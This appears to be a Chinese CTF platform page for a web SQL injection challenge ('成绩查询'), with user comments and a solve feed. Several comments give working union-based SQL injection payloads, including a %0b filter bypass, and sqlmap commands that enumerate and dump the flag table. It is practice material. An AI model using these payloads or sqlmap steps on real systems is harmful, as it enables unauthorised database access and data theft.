成绩查询WEB 未解决

分数: 25 金币: 2
题目作者: 未知
一  血: npfs
一血奖励: 1金币
解  决: 9222
提  示:
描  述:
来源山科大ctf
评论
Hobin 2年前

一个sqlmap就能完美解决

回复 0

MONSTEinCAT 2年前

鸡你太美

回复 1
阿厂 2年前

哎呦你干嘛

回复 0

肥肠粉 2年前

小黑子,哥哥下的蛋你别吃

回复 0

Sauexceed 2年前

小黑子

回复 0

yemur 2年前

id=-1' union select 1,2,3,skctf_flag from fl4g#

回复 0

lysandria 2年前

过滤了一些东西,空格用%0b绕过。payload:id=-1' union%0bselect%0bgroup_concat(skctf_flag),2,3,4%0bfrom fl4g#

回复 0

15338641414 2年前

输入框的sql注入

回复 0

Hey0iopklh 2年前

'闭合,union注入

回复 0

落叶满阶红 2年前

这题啊,,学了sqlmap使用方法。。自动干进去了,python2 sqlmap.py -u “URL地址” --data=”id=1” --current-db查询当前使用数据库,-D skctf(库名) --tables 查下面所有表,-T fl4g(表名)--columns列出所有的字段名,-C skctf_flag --dump列出字段内容,找到flag

回复 7

02 2年前

有的方法flag根本出不来

回复 0

w1707154109 2年前

超级简单的sql

回复 0

放鹤 2年前

为什么提交的flag不对

回复 0
MONSTEinCAT 2年前

要提交两次才行

回复 0

WriteUp

image
harry

2 金币

评分(21)

解题动态

ctfgoer 攻破了该题 11小时前
24030111073 攻破了该题 20小时前
admin11linyu 攻破了该题 1天前
2573745604 攻破了该题 1天前
3495825647 攻破了该题 1天前
DURUI 攻破了该题 1天前
handk 攻破了该题 1天前
asss 攻破了该题 1天前
yinyx 攻破了该题 1天前
Gyro 攻破了该题 2天前
AAxiao 攻破了该题 2天前
shai 攻破了该题 2天前
勇敢的黄金矿工 攻破了该题 2天前
liuzibo 攻破了该题 2天前
yixcjy 攻破了该题 3天前
zhiyin 攻破了该题 3天前
16651618785 攻破了该题 4天前
besty2k 攻破了该题 4天前
西北狼 攻破了该题 4天前
feifeifei1212 攻破了该题 4天前
问题反馈